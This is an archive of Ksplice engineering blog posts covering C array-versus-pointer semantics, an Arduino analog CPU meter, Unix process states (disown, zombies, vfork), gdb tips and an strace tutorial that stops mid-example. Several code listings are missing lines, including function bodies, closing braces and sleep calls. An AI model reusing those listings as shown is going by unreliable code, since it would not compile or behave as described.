Tuesday Oct 18, 2011

The Ksplice Pointer Challenge

Back when Ksplice was just a research project at MIT, we all spent a lot of time around the student computing group, SIPB. While there, several precocious undergrads kept talking about how excited they were to take 6.828, MIT's operating systems class.

"You really need to understand pointers for this class," we cautioned them. "Reread K&R Chapter 5, again." Of course, they insisted that they understood pointers and didn't need to. So we devised a test.

Ladies and gentlemen, I hereby do officially present the Ksplice Pointer Challenge, to be answered without the use of a computer:

What does this program print?

#include <stdio.h>
int main() {
  int x[5];
  printf("%p\n", x);
  printf("%p\n", x+1);
  printf("%p\n", &x);
  printf("%p\n", &x+1);
  return 0;

This looks simple, but it captures a surprising amount of complexity. Let's break it down.

To make this concrete, let's assume that x is stored at address 0x7fffdfbf7f00 (this is a 64-bit system). We've hidden each entry so that you have to click to make it appear -- I'd encourage you to think about what the line should output, before revealing the answer.

printf("%p\n", x);
What will this print?

Well, x is an array, right? You're no stranger to array syntax: x[i] accesses the ith element of x.

If we search back in the depths of our memory, we remember that x[i] can be rewritten as *(x+i). For that to work, x must be the memory location of the start of the array.

Result: printf("%p\n", x) prints 0x7fffdfbf7f00. Alright.

printf("%p\n", x+1);
What will this print?

So, x is 0x7fffdfbf7f00, and therefore x+1 should be 0x7fffdfbf7f01, right?

You're not fooled. You remember that  in C, pointer arithmetic is special and magical. If you have a pointer p to an int, p+1 actually adds sizeof(int)to p. It turns out that we need this behavior if *(x+i) is properly going to end up pointing us at the right place -- we need to move over enough to pass one entry in the array. In this case, sizeof(int) is 4.

Result: printf("%p\n", x) prints 0x7fffdfbf7f04. So far so good.

printf("%p\n", &x);
What will this print?

Well, let's see. & basically means "the address of", so this is like asking "Where does x live in memory?" We answered that earlier, didn't we? x lives at 0x7fffdfbf7f00, so that's what this should print.

But hang on a second... if &x is 0x7fffdfbf7f00, that means that it lives at 0x7fffdfbf7f00. But when we print x, we also get 0x7fffdfbf7f00. So x == &x.

How can that possibly work? If x is a pointer that lives at 0x7fffdfbf7f00, and also points to 0x7fffdfbf7f00, where is the actual array stored?

Thinking about that, I draw a picture like this:

That can't be right.

So what's really going on here? Well, first off, anyone who ever told you that a pointer and an array were the same thing was lying to you. That's our fallacy here. If x were a pointer, and x == &x, then yes, we would have something like the picture above. But x isn't a pointer -- x is an array!

And it turns out that in certain situations, an array can automatically "decay" into a pointer. Into &x[0], to be precise. That's what's going on in examples 1 and 2. But not here. So &x does indeed print the address of x.

Result: printf("%p\n", &x) prints 0x7fffdfbf7f00.

Aside: what is the type of &x[0]? Well, x[0] is an int, so &x[0] is "pointer to int". That feels right.

printf("%p\n", &x+1);
What will this print?

Ok, now for the coup de grace. x may be an array, but &x is definitely a pointer. So what's &x+1?

First, another aside: what is the type of &x? Well... &x is a pointer to an array of 5 ints. How would you declare something like that?

Let's fire up cdecl and find out:

cdecl> declare y as array 5 of int;
int y[5]
cdecl> declare y as pointer to array 5 of int;
int (*y)[5]

Confusing syntax, but it works:
int (*y)[5] = &x; compiles without error and works the way you'd expect.

But back to the question at hand. Pointer arithmetic tells us that &x+1 is going to be the address of x + sizeof(x). What's sizeof(x)? Well, it's an array of 5 ints. On this system, each int is 4 bytes, so it should be 20 bytes, or 0x14.

Result &x+1 prints 0x7fffdfbf7f14.

And thus concludes the Ksplice pointer challenge.

What's the takeaway? Arrays are not pointers (though they sometimes pretend to be!). More generally, C is subtle. Oh, and 6.828 students, if you're having trouble with Lab 5, it's probably because of a bug in your Lab 2.

P.S. If you're interested in hacking on low-level systems at a place where your backwards-and-forwards knowledge of C semantics will be more than just an awesome party trick, we're looking to hire kernel hackers for the Ksplice team.

We're based in beautiful Cambridge, Mass., though working remotely is definitely an option. Send me an email at waseem.daher@oracle.com with a resume and/or a github link if you're interested!

Monday Jun 27, 2011

Building a physical CPU load meter

I built this analog CPU load meter for my dev workstation:

Physical CPU load meter

All I did was drill a few holes into the CPU and probe the power supply lines...

Okay, I lied. This is actually a fun project that would make a great intro to embedded electronics, or a quick afternoon hack for someone with a bit of experience.

The parts

The main components are:

  • Current meter: I got this at MIT Swapfest. The scale printed on the face is misleading: the meter itself measures only about 600 microamps in each direction. (It's designed for use with a circuit like this one). We can determine the actual current scale by connecting (in series) the analog meter, a variable resistor, and a digital multimeter, and driving them from a 5 volt power supply. This lets us adjust and reliably measure the current flowing through the analog meter.

  • Arduino: This little board has a 16 MHz processor, with direct control of a few dozen input/output pins, and a USB serial interface to a computer. In our project, it will take commands over USB and produce the appropriate amount of current to drive the meter. We're not even using most of the capabilities of the Arduino, but it's hard to beat as a platform for rapid development.

  • Resistor: The Arduino board is powered over USB; its output pins produce 5 volts for a logic 'high'. We want this 5 volt potential to push 600 microamps of current through the meter, according to the earlier measurement. Using Ohm's law we can calculate that we'll need a resistance of about 8.3 kilohms. Or you can just measure the variable resistor from earlier.

We'll also use some wire, solder, and tape.

Building it

The resistor goes in series with the meter. I just soldered it directly to the back:

Back of the meter

Some tape over these components prevents them from shorting against any of the various junk on my desk. Those wires run to the Arduino, hidden behind my monitor, which is connected to the computer by USB:

The Arduino

That's it for hardware!

Code for the Arduino

The Arduino IDE will compile code written in a C-like language and upload it to the Arduino board over USB. Here's our program:

#define DIRECTION 2
#define MAGNITUDE 3

void setup() {

void loop() {
    int x = Serial.read();
    if (x == -1)

    if (x < 128) {
        digitalWrite(DIRECTION, LOW);
        analogWrite (MAGNITUDE, 2*(127 - x));
    } else {
        digitalWrite(DIRECTION, HIGH);
        analogWrite (MAGNITUDE, 255 - 2*(x - 128));

When it turns on, the Arduino will execute setup() once, and then call loop() over and over, forever. On each iteration, we try to read a byte from the serial port. A value of -1 indicates that no byte is available, so we return and try again a moment later. Otherwise, we translate a byte value between 0 to 255 into a meter deflection between −600 and 600 microamps.

Pins 0 and 1 are used for serial communication, so I connected the meter to pins 2 and 3, and named them DIRECTION and MAGNITUDE respectively. When we call analogWrite on the MAGNITUDE pin with a value between 0 and 255, we get a proportional voltage between 0 and 5 volts. Actually, the Arduino fakes this by alternating between 0 and 5 volts very rapidly, but our meter is a slow mechanical object and won't know the difference.

Suppose the MAGNITUDE pin is at some intermediate voltage between 0 and 5 volts. If the DIRECTION pin is low (0 V), conventional current will flow from MAGNITUDE to DIRECTION through the meter. If we set DIRECTION high (5 V), current will flow from DIRECTION to MAGNITUDE. So we can send current through the meter in either direction, and we can control the amount of current by controlling the effective voltage at MAGNITUDE. This is all we need to make the meter display whatever reading we want.

Code for the Linux host

On Linux we can get CPU load information from the proc special filesystem:

keegan@lyle$ head -n 1 /proc/stat
cpu  965348 22839 479136 88577774 104454 5259 24633 0 0

These numbers tell us how much time the system's CPUs have spent in each of several states:

  1. user: running normal user processes
  2. nice: running user processes of low priority
  3. system: running kernel code, often on behalf of user processes
  4. idle: doing nothing because all processes are sleeping
  5. iowait: doing nothing because all runnable processes are waiting on I/O devices
  6. irq: handling asynchronous events from hardware
  7. softirq: performing tasks deferred by irq handlers
  8. steal: not running, because we're in a virtual machine and some other VM is using the physical CPU
  9. guest: acting as the host for a running virtual machine

The numbers in /proc/stat are cumulative totals since boot, measured in arbitrary time units. We can read the file twice and subtract, in order to get a measure of where CPU time was spent recently. Then we'll use the fraction of time spent in states other than idle as a measure of CPU load, and send this to the Arduino.

We'll do all this with a small Python script. The pySerial library lets us talk to the Arduino over USB serial. We'll configure it for 57,600 bits per second, the same rate specified in the Arduino's setup() function. Here's the code:

#!/usr/bin/env python

import serial
import time

port = serial.Serial('/dev/ttyUSB0', 57600)

old = None
while True:
    with open('/proc/stat') as stat:
        new = map(float, stat.readline().strip().split()[1:])
    if old is not None:
        diff = [n - o for n, o in zip(new, old)]
        idle = diff[3] / sum(diff)
        port.write(chr(int(255 * (1 - idle))))
    old = new

That's it!

That's all it takes to make a physical, analog CPU meter. It's been done before and will be done again, but we're interested in what you'd do (or have already done!) with the concept. You could measure website hits, or load across a whole cluster, or your profits from trading Bitcoins. One standard Arduino can run at least six meters of this type (being the number of pins which support analogWrite), and a number of switches, knobs, buzzers, and blinky lights besides. If your server room has a sweet control panel, we'd love to see a picture!


Wednesday Mar 16, 2011

disown, zombie children, and the uninterruptible sleep

PID 1 Riding, by Albrecht Dürer

It's the end of the day on Friday. On your laptop, in an ssh session on a work machine, you check on long.sh, which has been running all day and has another 8 or 9 hours to go. You start to close your laptop.

You freeze for a second and groan.

This was supposed to be running under a screen session. You know that if you kill the ssh connection, that'll also kill long.sh. What are you going to do? Leave your laptop for the weekend? Kill the job, losing the last 8 hours of work?

You think about what long.sh does for a minute, and breathe a sigh of relief. The output is written to a file, so you don't care about terminal output. This means you can use disown.

How does this little shell built-in let your jobs finish even when you kill the parent process (the shell inside the ssh connection)?

Dissecting disown

As we'll see, disown synthesizes 3 big UNIX concepts: signals, process states, and job control.

The point of disowning a process is that it will continue to run even when you exit the shell that spawned it. Getting this to work requires a prelude. The steps are:

  1. suspend the process with ctl-Z.
  2. background with bg.
  3. disown the job.

What does each of these steps accomplish?

First, here's a summary of the states that a process can be in, from the ps man page:

       Here are the different values that the s, stat and state output specifiers (header "STAT" or "S")
       will display to describe the state of a process.
       D    Uninterruptible sleep (usually IO)
       R    Running or runnable (on run queue)
       S    Interruptible sleep (waiting for an event to complete)
       T    Stopped, either by a job control signal or because it is being traced.
       W    paging (not valid since the 2.6.xx kernel)
       X    dead (should never be seen)
       Z    Defunct ("zombie") process, terminated but not reaped by its parent.

       For BSD formats and when the stat keyword is used, additional characters may be displayed:
       <    high-priority (not nice to other users)
       N    low-priority (nice to other users)
       L    has pages locked into memory (for real-time and custom IO)
       s    is a session leader
       l    is multi-threaded (using CLONE_THREAD, like NPTL pthreads do)
       +    is in the foreground process group

And here is a transcript of the steps to disown long.sh. To the right of each step is some useful ps output, in particular the parent process id (PPID), what process state our long job is in (STAT), and the controlling terminal (TT). I've highlighted the interesting changes:

Shell 1: disown Shell 2: monitor with ps
1. Start program
$ sh long.sh
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298 26145 S+   pts/0    sh long.sh
2. Suspend program with Ctl-z
[1]+  Stopped     sh long.sh
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298 26145 T    pts/0    sh long.sh
3. Resume program in background
$ bg
[1]+ sh long.sh &
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298 26145 S    pts/0    sh long.sh
4. disown job 1, our program
$ disown %1
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298 26145 S    pts/0    sh long.sh
5. Exit the shell
$ exit
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298     1 S    ?        sh long.sh

Putting this information together:

  1. When we run long.sh from the command line, its parent is the shell (PID 26145 in this example). Even though it looks like it is running as we watch it in the terminal, it mostly isn't; long.sh is waiting on some resource or event, so it is in process state S for interruptible sleep. It is in fact in the foreground, so it also gets a +.
  2. First, we suspend the program with Ctl-z. By ``suspend'', we mean send it the SIGTSTP signal, which is like SIGSTOP except that you can install your own signal handler for or ignore it. We see proof in the state change: it's now in T for stopped.
  3. Next, bg sets our process running again, but in the background, so we get the S for interruptible sleep, but no +.
  4. Finally, we can use disown to remove the process from the jobs list that our shell maintains. Our process has to be active when it is removed from the list or it'll get reaped when we kill the parent shell, which is why we needed the bg step.
  5. When we exit the shell, we are sending it a SIGHUP, which it propagates to all children in the jobs table**. By default, a SIGHUP will terminate a process. Because we removed our job from the jobs table, it doesn't get the SIGHUP and keeps on running (STAT S). However, since its parent the shell died, and the shell was the session leader in charge of the controlling tty, it doesn't have a tty anymore (TT ?). Additionally, our long job needs a new parent, so init, with PID 1, becomes the new parent process.
**This is not always true, as it turns out. In the bash shell, for example, there is a huponexit shell option. If this option is disabled, a SIGHUP to the shell isn't propagated to the children. This means if you have a backgrounded, active process (you followed steps 1, 2, and 3 above, or you started the process backgrounded with ``&'') and you exit the shell, you don't have to use disown for the process to keep running. You can check or toggle the huponexit shell option with the shopt shell built-in.

And that is disown in a nutshell.

What else can we learn about process states?

Dissecting disown presents enough interesting tangents about signals, process states, and job control for a small novel. Focusing on process states for this post, here are a few such tangents:

1. There are a lot of process states and modifiers. We saw some interruptible sleeps and suspended processes with disown, but what states are most common?

Using my laptop as a data source and taking advantage of ps format specifiers, we can get counts for the different process states:

jesstess@aja:~$ ps -e h -o stat | sort | uniq -c | sort -rn
     90 S
     31 Sl
     17 Ss
      9 Ss+
      8 Ssl
      4 S<
      3 S+
      2 SNl
      1 S<sl
      1 S<s
      1 SN
      1 SLl
      1 R+

So the vast majority are in an interruptible sleep (S), and a few processes are extra nice (N) and extra mean (<).

We can drill down on process ``niceness'', or scheduling priority, with the ni format specifier to ps:

jesstess@aja:~$ ps -e h -o ni | sort -n | uniq -c
      1 -11
      2  -5
      1  -4
      2  -2
      4   -
    156   0
      1   1
      1   5
      1  10

The numbers range from 19 (super friendly, low scheduling priority) to -20 (a total bully, high scheduling priority). The 6 processes with negative numbers are the 6 with a < process state modifier in the ``ps -e h -o stat'' output, and the 3 with positive numbers have the Ns. Most processes don't run under a special scheduling priority.

Why is almost nothing actually running?

In the ``ps -e h -o stat'' output above, only 1 process was marked as R running or runnable. This is a multi-processor machine, and there are over 150 other processes, so why isn't something running on the other processor?

The answer is that on an unloaded system, most processes really are waiting on an event or resource, so they can't run. On the laptop where I ran these tests, uptime tells us that we have a load average under 1:

jesstess@aja:~$ uptime
 13:09:10 up 16 days, 14:09,  5 users,  load average: 0.92, 0.87, 0.82

So we'd only expect to see 1 process in the R state at any given time for that load.

If we hop over to a more loaded machine -- a shell machine at MIT -- things are a little more interesting:

dr-wily:~> ps -e -o stat,cmd | awk '{if ($1 ~/R/) print}'
R+   /mit/barnowl/arch/i386_deb50/bin/barnowl.real.zephyr3
R+   ps -e -o stat,cmd
R+   w
dr-wily:~> uptime
 23:23:16 up 22 days, 20:09, 132 users,  load average: 3.01, 3.66, 3.43
dr-wily:~> grep processor /proc/cpuinfo
processor	: 0
processor	: 1
processor	: 2
processor	: 3

The machine has 4 processors. On average, 3 or 4 processors have processes running (in the R state). To get a sense of how the running processes change over time, throw the ps line under watch:

watch -n 1 "ps -e -o stat,cmd | awk '{if (\$1 ~/R/) print}'"

We get something like:

watching the changing output of ps

2. What about the zombies?

Noticeably absent in the process state summaries above are zombie processes (STAT Z) and processes in uninterruptible sleep (STAT D).

A process becomes a zombie when it has completed execution but hasn't been reaped by its parent. If a program produces long-lived zombies, this is usually a bug; zombies are undesirable because they take up process IDs, which are a limited resource.

I had to dig around a bit to find real examples of zombies. The winners were old barnowl zephyr clients (zephyr is a popular instant messaging system at MIT):

jesstess@linerva:~$ ps -e h -o stat,cmd | awk '{if ($1 ~/Z/) print}'
Z+   [barnowl] <defunct>
Z+   [barnowl] <defunct>

However, since all it takes to produce a zombie is a child exiting without the parent reaping it, it's easy to construct our own zombies of limited duration:

jesstess@aja:~$ cat zombie.c 
#include <sys/types.h>

int main () {
    pid_t child_pid = fork();
    if (child_pid > 0) {
    return 0;
jesstess@aja:~$ gcc -o zombie zombie.c
jesstess@aja:~$ ./zombie
[1]+  Stopped                 ./zombie
jesstess@aja:~$ ps -o stat,cmd $(pgrep -f zombie)
T    ./zombie
Z    [zombie] <defunct>

When you run this script, the parent dies after 60 seconds, init becomes the zombie child's new parent, and init quickly reaps the child by making a wait system call on the child's PID, which removes it from the system process table.

3. What about the uninterruptible sleeps?

A process is put in an uninterruptible sleep (STAT D) when it needs to wait on something (typically I/O) and shouldn't be handling signals while waiting. This means you can't kill it, because all kill does is send it signals. This might happen in the real world if you unplug your NFS server while other machines have open network connections to it.

We can create our own uninterruptible processes of limited duration by taking advantage of the vfork system call. vfork is like fork, except the address space is not copied from the parent into the child, in anticipation of an exec which would just throw out the copied data. Conveniently for us, when you vfork the parent waits uninterruptibly (by way of wait_on_completion) on the child's exec or exit:

jesstess@aja:~$ cat uninterruptible.c 
int main() {
    return 0;
jesstess@aja:~$ gcc -o uninterruptible uninterruptible.c
jesstess@aja:~$ echo $$
jesstess@aja:~$ ./uninterruptible

and in another shell:

jesstess@aja:~$ ps -o ppid,pid,stat,cmd $(pgrep -f uninterruptible)

13291  1972 D+   ./uninterruptible
 1972  1973 S+   ./uninterruptible

We see the child (PID 1973, PPID 1972) in an interruptible sleep and the parent (PID 1972, PPID 13291 -- the shell) in an uninterruptible sleep while it waits for 60 seconds on the child.

One neat (mischievous?) thing about this script is that processes in an uninterruptible sleep contribute to the load average for a machine. So you could run this script 100 times to temporarily give a machine a load average elevated by 100, as reported by uptime.

It's a family affair

Signals, process states, and job control offer a wealth of opportunities for exploration on a Linux system: we've already disowned children, killed parents, witnessed adoption (by init), crafted zombie children, and more. If this post inspires fun tangents or fond memories, please share in the comments!

*Albrecht had some help from Adam and Photoshop Elements. Larger version here.
Props to Nelson for his boundless supply of sysadmin party tricks, which includes this vfork example.


Monday Jan 24, 2011

8 gdb tricks you should know

Despite its age, gdb remains an amazingly versatile and flexible tool, and mastering it can save you huge amounts of time when trying to debug problems in your code. In this post, I'll share 10 tips and tricks for using GDB to debug most efficiently.

I'll be using the Linux kernel for examples throughout this post, not because these examples are necessarily realistic, but because it's a large C codebase that I know and that anyone can download and take a look at. Don't worry if you aren't familiar with Linux's source in particular -- the details of the examples won't matter too much.

  1. break WHERE if COND

    If you've ever used gdb, you almost certainly know about the "breakpoint" command, which lets you break at some specified point in the debugged program.

    But did you know that you can set conditional breakpoints? If you add if CONDITION to a breakpoint command, you can include an expression to be evaluated whenever the program reaches that point, and the program will only be stopped if the condition is fulfilled. Suppose I was debugging the Linux kernel and wanted to stop whenever init got scheduled. I could do:

    (gdb) break context_switch if next == init_task

    Note that the condition is evaluated by gdb, not by the debugged program, so you still pay the cost of the target stopping and switching to gdb every time the breakpoint is hit. As such, they still slow the target down in relation to to how often the target location is hit, not how often the condition is met.

  2. command

    In addition to conditional breakpoints, the command command lets you specify commands to be run every time you hit a breakpoint. This can be used for a number of things, but one of the most basic is to augment points in a program to include debug output, without having to recompile and restart the program. I could get a minimal log of every mmap() operation performed on a system using:

    (gdb) b do_mmap_pgoff 
    Breakpoint 1 at 0xffffffff8111a441: file mm/mmap.c, line 940.
    (gdb) command 1
    Type commands for when breakpoint 1 is hit, one per line.
    End with a line saying just "end".
    >print addr
    >print len
    >print prot
  3. gdb --args

    This one is simple, but a huge timesaver if you didn't know it. If you just want to start a program under gdb, passing some arguments on the command line, you can just build your command-line like usual, and then put "gdb --args" in front to launch gdb with the target program and the argument list both set:

    [~]$ gdb --args pizzamaker --deep-dish --toppings=pepperoni
    (gdb) show args
    Argument list to give program being debugged when it is started is
      " --deep-dish --toppings=pepperoni".
    (gdb) b main
    Breakpoint 1 at 0x45467c: file oven.c, line 123.
    (gdb) run

    I find this especially useful if I want to debug a project that has some arcane wrapper script that assembles lots of environment variables and possibly arguments before launching the actual binary (I'm looking at you, libtool). Instead of trying to replicate all that state and then launch gdb, simply make a copy of the wrapper, find the final "exec" call or similar, and add "gdb --args" in front.

  4. Finding source files

    I run Ubuntu, so I can download debug symbols for most of the packages on my system from ddebs.ubuntu.com, and I can get source using apt-get source. But how do I tell gdb to put the two together? If the debug symbols include relative paths, I can use gdb's directory command to add the source directory to my source path:

    [~/src]$ apt-get source coreutils
    [~/src]$ sudo apt-get install coreutils-dbgsym
    [~/src]$ gdb /bin/ls
    GNU gdb (GDB) 7.1-ubuntu
    (gdb) list main
    1192    ls.c: No such file or directory.
        in ls.c
    (gdb) directory ~/src/coreutils-7.4/src/
    Source directories searched: /home/nelhage/src/coreutils-7.4:$cdir:$cwd
    (gdb) list main
    1192        }
    1193    }
    1195    int
    1196    main (int argc, char **argv)
    1197    {
    1198      int i;
    1199      struct pending *thispend;
    1200      int n_files;

    Sometimes, however, debug symbols end up with absolute paths, such as the kernel's. In that case, I can use set substitute-path to tell gdb how to translate paths:

    [~/src]$ apt-get source linux-image-2.6.32-25-generic
    [~/src]$ sudo apt-get install linux-image-2.6.32-25-generic-dbgsym
    [~/src]$ gdb /usr/lib/debug/boot/vmlinux-2.6.32-25-generic 
    (gdb) list schedule
    5519    /build/buildd/linux-2.6.32/kernel/sched.c: No such file or directory.
        in /build/buildd/linux-2.6.32/kernel/sched.c
    (gdb) set substitute-path /build/buildd/linux-2.6.32 /home/nelhage/src/linux-2.6.32/
    (gdb) list schedule
    5520    static void put_prev_task(struct rq *rq, struct task_struct *p)
    5521    {
    5522        u64 runtime = p->se.sum_exec_runtime - p->se.prev_sum_exec_runtime;
    5524        update_avg(&p->se.avg_running, runtime);
    5526        if (p->state == TASK_RUNNING) {
    5527            /*
    5528             * In order to avoid avg_overlap growing stale when we are
  5. Debugging macros

    One of the standard reasons almost everyone will tell you to prefer inline functions over macros is that debuggers tend to be better at dealing with inline functions. And in fact, by default, gdb doesn't know anything at all about macros, even when your project was built with debug symbols:

    (gdb) p GFP_ATOMIC
    No symbol "GFP_ATOMIC" in current context.
    (gdb) p task_is_stopped(&init_task)
    No symbol "task_is_stopped" in current context.

    However, if you're willing to tell GCC to generate debug symbols specifically optimized for gdb, using -ggdb3, it can preserve this information:

    $ make KCFLAGS=-ggdb3
    (gdb) break schedule
    (gdb) continue
    (gdb) p/x GFP_ATOMIC
    $1 = 0x20
    (gdb) p task_is_stopped_or_traced(init_task)
    $2 = 0

    You can also use the macro and info macro commands to work with macros from inside your gdb session:

    (gdb) macro expand task_is_stopped_or_traced(init_task)
    expands to: ((init_task->state & (4 | 8)) != 0)
    (gdb) info macro task_is_stopped_or_traced
    Defined at include/linux/sched.h:218
      included at include/linux/nmi.h:7
      included at kernel/sched.c:31
    #define task_is_stopped_or_traced(task) ((task->state & (__TASK_STOPPED | __TASK_TRACED)) != 0)

    Note that gdb actually knows which contexts macros are and aren't visible, so when you have the program stopped inside some function, you can only access macros visible at that point. (You can see that the "included at" lines above show you through exactly what path the macro is visible).

  6. gdb variables

    Whenever you print a variable in gdb, it prints this weird $NN = before it in the output:

    (gdb) p 5+5
    $1 = 10

    This is actually a gdb variable, that you can use to reference that same variable any time later in your session:

    (gdb) p $1
    $2 = 10

    You can also assign your own variables for convenience, using set:

    (gdb) set $foo = 4
    (gdb) p $foo
    $3 = 4

    This can be useful to grab a reference to some complex expression or similar that you'll be referencing many times, or, for example, for simplicity in writing a conditional breakpoint (see tip 1).

  7. Register variables

    In addition to the numeric variables, and any variables you define, gdb exposes your machine's registers as pseudo-variables, including some cross-architecture aliases for common ones, like $sp for the the stack pointer, or $pc for the program counter or instruction pointer.

    These are most useful when debugging assembly code or code without debugging symbols. Combined with a knowledge of your machine's calling convention, for example, you can use these to inspect function parameters:

    (gdb) break write if $rsi == 2

    will break on all writes to stderr on amd64, where the $rsi register is used to pass the first parameter.

  8. The x command

    Most people who've used gdb know about the print or p command, because of its obvious name, but I've been surprised how many don't know about the power of the x command.

    x (for "examine") is used to output regions of memory in various formats. It takes two arguments in a slightly unusual syntax:


    ADDRESS, unsurprisingly, is the address to examine; It can be an arbitrary expression, like the argument to print.

    FMT controls how the memory should be dumped, and consists of (up to) three components:

    • A numeric COUNT of how many elements to dump
    • A single-character FORMAT, indicating how to interpret and display each element
    • A single-character SIZE, indicating the size of each element to display.

    x displays COUNT elements of length SIZE each, starting from ADDRESS, formatting them according to the FORMAT.

    There are many valid "format" arguments; help x in gdb will give you the full list, so here's my favorites:

    x/x displays elements in hex, x/d displays them as signed decimals, x/c displays characters, x/i disassembles memory as instructions, and x/s interprets memory as C strings.

    The SIZE argument can be one of: b, h, w, and g, for one-, two-, four-, and eight-byte blocks, respectively.

    If you have debug symbols so that GDB knows the types of everything you might want to inspect, p is usually a better choice, but if not, x is invaluable for taking a look at memory.

    [~]$ grep saved_command /proc/kallsyms
    ffffffff81946000 B saved_command_line
    (gdb) x/s 0xffffffff81946000
    ffffffff81946000 <>:     "root=/dev/sda1 quiet"

    x/i is invaluable as a quick way to disassemble memory:

    (gdb) x/5i schedule
       0xffffffff8154804a <schedule>:   push   %rbp
       0xffffffff8154804b <schedule+1>: mov    $0x11ac0,%rdx
       0xffffffff81548052 <schedule+8>: mov    %gs:0xb588,%rax
       0xffffffff8154805b <schedule+17>:    mov    %rsp,%rbp
       0xffffffff8154805e <schedule+20>:    push   %r15

    If I'm stopped at a segfault in unknown code, one of the first things I try is something like x/20i $ip-40, to get a look at what the code I'm stopped at looks like.

    A quick-and-dirty but surprisingly effective way to debug memory leaks is to let the leak grow until it consumes most of a program's memory, and then attach gdb and just x random pieces of memory. Since the leaked data is using up most of memory, you'll usually hit it pretty quickly, and can try to interpret what it must have come from.


Ksplice is hiring!

Do you love tinkering with, exploring, and debugging Linux systems? Does writing Python clones of your favorite childhood computer games sound like a fun weekend project? Have you ever told a joke whose punch line was a git command?

Join Ksplice and work on technology that most people will tell you is impossible: updating the Linux kernel while it is running.

Help us develop the software and infrastructure to bring rebootless kernel updates to Linux, as well as new operating system kernels and other parts of the software stack. We're hiring backend, frontend, and kernel engineers. Say hello at jobs@ksplice.com!

Thursday Aug 05, 2010

Strace -- The Sysadmin's Microscope

Sometimes as a sysadmin the logfiles just don't cut it, and to solve a problem you need to know what's really going on. That's when I turn to strace -- the system-call tracer.

A system call, or syscall, is where a program crosses the boundary between user code and the kernel. Fortunately for us using strace, that boundary is where almost everything interesting happens in a typical program.

The two basic jobs of a modern operating system are abstraction and multiplexing. Abstraction means, for example, that when your program wants to read and write to disk it doesn't need to speak the SATA protocol, or SCSI, or IDE, or USB Mass Storage, or NFS. It speaks in a single, common vocabulary of directories and files, and the operating system translates that abstract vocabulary into whatever has to be done with the actual underlying hardware you have. Multiplexing means that your programs and mine each get fair access to the hardware, and don't have the ability to step on each other -- which means your program can't be permitted to skip the kernel, and speak raw SATA or SCSI to the actual hardware, even if it wanted to.

So for almost everything a program wants to do, it needs to talk to the kernel. Want to read or write a file? Make the open() syscall, and then the syscalls read() or write(). Talk on the network? You need the syscalls socket(), connect(), and again read() and write(). Make more processes? First clone() (inside the standard C library function fork()), then you probably want execve() so the new process runs its own program, and you probably want to interact with that process somehow, with one of wait4(), kill(), pipe(), and a host of others. Even looking at the clock requires a system call, clock_gettime(). Every one of those system calls will show up when we apply strace to the program.

In fact, just about the only thing a process can do without making a telltale system call is pure computation -- using the CPU and RAM and nothing else. As a former algorithms person, that's what I used to think was the fun part. Fortunately for us as sysadmins, very few real-life programs spend very long in that pure realm between having to deal with a file or the network or some other part of the system, and then strace picks them up again.

Let's look at a quick example of how strace solves problems.

Use #1: Understand A Complex Program's Actual Behavior
One day, I wanted to know which Git commands take out a certain lock -- I had a script running a series of different Git commands, and it was failing sometimes when run concurrently because two commands tried to hold the lock at the same time.

Now, I love sourcediving, and I've done some Git hacking, so I spent some time with the source tree investigating this question. But this code is complex enough that I was still left with some uncertainty. So I decided to get a plain, ground-truth answer to the question: if I run "git diff", will it grab this lock?

Strace to the rescue. The lock is on a file called index.lock. Anything trying to touch the file will show up in strace. So we can just trace a command the whole way through and use grep to see if index.lock is mentioned:

$ strace git status 2>&1 >/dev/null | grep index.lock
open(".git/index.lock", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
rename(".git/index.lock", ".git/index") = 0

$ strace git diff 2>&1 >/dev/null | grep index.lock

So git status takes the lock, and git diff doesn't.

Interlude: The Toolbox
To help make it useful for so many purposes, strace takes a variety of options to add or cut out different kinds of detail and help you see exactly what's going on.

In Medias Res, If You Want
Sometimes we don't have the luxury of starting a program over to run it under strace -- it's running, it's misbehaving, and we need to find out what's going on. Fortunately strace handles this case with ease. Instead of specifying a command line for strace to execute and trace, just pass -p PID where PID is the process ID of the process in question -- I find pstree -p invaluable for identifying this -- and strace will attach to that program, while it's running, and start telling you all about it.

When I use strace, I almost always pass the -tt option. This tells me when each syscall happened -- -t prints it to the second, -tt to the microsecond. For system administration problems, this often helps a lot in correlating the trace with other logs, or in seeing where a program is spending too much time.

For performance issues, the -T option comes in handy too -- it tells me how long each individual syscall took from start to finish.

By default strace already prints the strings that the program passes to and from the system -- filenames, data read and written, and so on. To keep the output readable, it cuts off the strings at 32 characters. You can see more with the -s option -- -s 1024 makes strace print up to 1024 characters for each string -- or cut out the strings entirely with -s 0.

Sometimes you want to see the full data flowing in just a few directions, without cluttering your trace with other flows of data. Here the options -e read= and -e write= come in handy.

For example, say you have a program talking to a database server, and you want to see the SQL queries, but not the voluminous data that comes back. The queries and responses go via write() and read() syscalls on a network socket to the database. First, take a preliminary look at the trace to see those syscalls in action:

$ strace -p 9026
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52

Those write() syscalls are the SQL queries -- we can make out the SELECT foo FROM bar, and then it trails off. To see the rest, note the file descriptor the syscalls are happening on -- the first argument of read() or write(), which is 3 here. Pass that file descriptor to -e write=:

$ strace -p 9026 -e write=3
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
 | 00000  30 00 00 00 03 53 45 4c  45 43 54 20 74 69 6d 65  0....SEL ECT time |
 | 00010  73 74 61 6d 70 20 46 52  4f 4d 20 61 72 74 69 66  stamp FR OM artif |
